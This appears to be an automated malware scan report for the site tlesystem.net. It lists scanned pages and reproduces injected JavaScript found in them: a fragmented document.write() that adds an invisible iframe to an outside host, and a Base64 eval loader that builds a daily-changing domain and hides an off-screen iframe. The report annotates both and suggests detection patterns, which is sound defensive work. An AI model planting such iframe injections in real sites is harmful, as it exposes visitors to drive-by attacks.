Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tlesystem.net
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tlesystem.net/ | 200 OK Content-Length: 23933 Content-Type: text/html | clean |
http://www.tlesystem.net/media/system/js/caption.js | 200 OK Content-Length: 1935 Content-Type: application/javascript | malicious |
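Malicious code - confirmed by antiviruses (see below):
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.style.width = width + "px"; } }); document.caption = null window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://pr'+'an'+'tijk'+'e'+'lav'+'anim'+'an'+'dal.'+'org/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>');
Note: the injected part is the trailing document.write() call, appended after what appears to be the file's original JCaption code. It writes an iframe with width="0" and height="0", so nothing is visible to the visitor. The src is assembled from short string fragments, so a plain-text search of the file for the full URL will not match; joined, the fragments read hxxp://prantijkelavanimandal[.]org/components/com_content/models/sh.html.
Antivirus reports: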
| ||
http://www.tlesystem.net/templates/ja_larix/scripts/ja.script.js | 200 OK Content-Length: 5744 Content-Type: application/javascript | clean |
http://www.tlesystem.net/templates/ja_larix/ja_menus/ja_cssmenu/ja.cssmenu.js | 200 OK Content-Length: 1158 Content-Type: application/javascript | clean |
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js/mootools&file[1]=mootools-release-1.11.js&subdir[2]=/js/mootools&file[2]=mooPrompt.js | 200 OK Content-Length: 54053 Content-Type: text/javascript | clean |
http://www.tlesystem.net/modules/mod_ja_vmproductslide/ja_vmproductslide/ja.vmproductslide.js | 200 OK Content-Length: 6141 Content-Type: application/javascript | clean |
http://www.tlesystem.net/index.php | 200 OK Content-Length: 53897 Content-Type: text/html | malicious |
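Malicious code - confirmed by antiviruses (see below):
eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
Decoded script:
var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); }
Resulting element:
<iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>
Note: both listings are cut short in this report. The Base64 argument has no closing quote, and the decoded text breaks off inside the document.write() string and resumes in what is presumably the body of iframer(). The iframe host is not fixed: each of its 11 characters is taken from keyss at index (ah*enc[i]) % 31, where ah is the day of the month plus one, so the hostname changes daily. 7dhidirji06[.]org is the value for day 14, which matches the 14 Jan 2015 date in the response headers shown elsewhere in this report. Blocking that one host is therefore not enough; matching on the inline eval() of a Base64 decoder, or on the constant path /ts/go.php?q=1, holds up better. The iframe is placed 1000px off-screen, so the visitor sees nothing.
Antivirus reports: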
| ||
http://www.tlesystem.net/modules/mod_virtuemart/vm_transmenu/transmenu.js | 200 OK Content-Length: 33382 Content-Type: application/javascript | clean |
http://www.tlesystem.net/templates/ja_larix/scripts/vm_stuff.js | 200 OK Content-Length: 702 Content-Type: application/javascript | clean |
http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Jan 2015 21:13:50 GMT Location: http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart&vmcchk=1 Server: nginx/1.6.2 Vary: Accept-Encoding,User-Agent Content-Length: 15 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 3d2e90a90b97134a7f209b432503405e=3kk81ufd2og6ngpn1crfhakh07; path=/ Set-Cookie: virtuemart=3kk81ufd2og6ngpn1crfhakh07 X-Powered-By: PHP/5.3.27 | clean |
http://www.tlesystem.net/index.php/component/virtuemart/?page=shop.cart&vmcchk=1 | 200 OK Content-Length: 32278 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja_larix&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 56266 Content-Type: text/javascript | clean |
http://www.tlesystem.net/index.php/component/virtuemart/ | 200 OK Content-Length: 34989 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 36551 Content-Type: text/javascript | clean |
http://www.tlesystem.net/index.php/home-tlesystem | 200 OK Content-Length: 54124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
| ||
http://www.tlesystem.net/index.php/ | 200 OK Content-Length: 53898 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI Decoded script: var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); } <iframe src='http://7dhidirji06.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tlesystem.net
Result:
GET / HTTP/1.1
Host: tlesystem.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tlesystem.net
Referer: http://www.google.com/search?q=tlesystem.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tlesystem.net
Referer: http://www.google.com/search?q=tlesystem.net
Result:
The result is similar to the first query. There are no suspicious redirects found.